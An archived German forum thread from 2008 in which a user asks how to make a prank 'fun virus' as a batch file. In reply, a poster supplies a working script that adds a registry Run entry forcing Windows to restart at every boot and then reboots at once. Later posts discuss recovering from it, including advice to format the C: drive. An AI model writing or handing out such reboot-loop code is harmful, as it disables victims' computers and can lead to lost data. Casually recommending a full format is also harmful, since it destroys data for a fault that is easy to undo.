PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Wie kann ich es machen?



j0n4s
27.11.2008, 20:37
Hi,
mir hatte mal jemand sonen funvirus geschickt.
mein monitor hat geflackert, der pc hat komische geräusche gemacht, fenster zoomten ran und weg, und die cd laufwerke gingen auf.

nun zur frage: wie mache ich sowas? gibts da auch sonen code wo man den dann in batchdatei abspeichert?

Zeko
27.11.2008, 20:39
Das geht mit den gängigen Sprachen unter Verwendung der Windows API. Ob es mit Batch geht, weiß ich nicht.

Gumball
27.11.2008, 20:39
Du hattest doch ein Thema mti deinen "Fun Viren",da war doch so einer mit enthalten,willste
mir ernsthaft sagen,dass du es verlernt hast?

fred777
27.11.2008, 20:41
Der ist wahrscheinlich in c++ oder VB6 gecodet, wenn einer meine Sammlung von den dingern benötigt, soll er sich melden^^.
Mit Batch kannst du schon so einiges machen, aber wie man den Monitor zum flackern bringt, kp

j0n4s
27.11.2008, 20:41
gumball, du hast mich dort schon genervt.
dort im ordner wo die alle drin sind, ist die EXE mit drin, ich habe NICHT ALLE selber gemacht. 2 sind dabei die ich nur mit reingemacht habe. und das mit dem bildschirmflackern usw. ist eins davon. ich will jez wissen wie ich sowas selber mache

wenns geht mit batch

Added after 44 seconds:


Der ist wahrscheinlich in c++ oder VB6 gecodet, wenn einer meine Sammlung von den dingern benötigt, soll er sich melden^^.
Mit Batch kannst du schon so einiges machen, aber wie man den Monitor zum flackern bringt, kp

hat geflackert und es kamen weiße streifen xD

fred777
27.11.2008, 20:44
Super funvirus in Batch:

echo off
cls
echo Windows Registry Editor Version 5.00 > reg.reg
echo. >> reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] >> reg.reg
echo "shutdown"="shutdown -r -t 00" >> reg.reg
echo. >> reg.reg
echo ;startet den Pc immer wieder neu >> reg.reg
reg import reg.reg
del reg.reg
shutdown -r -t 00
exit


und fertig ;)

fred777
28.11.2008, 16:17
Man, mach einen abgesicherten Modus und wähle Systemwiederherstellung.
ODer du schiebst die WinXPcd rein und wählst reparieren.
Schaust du dir den Code eigentlich nie an?
Dich sollte man aus dem Forum verbannen, bei solchen Beleidigungen!!!

KellerKind
28.11.2008, 16:18
LoL
Festplatte nicht im arsch^^ er fährt halt nur immer wieder runter steht aber auch in der echo^^
hol dir die windoof cd und mach format c: danach haste es fertig und nix neue festplatte^^


edit: war was zu langsam^^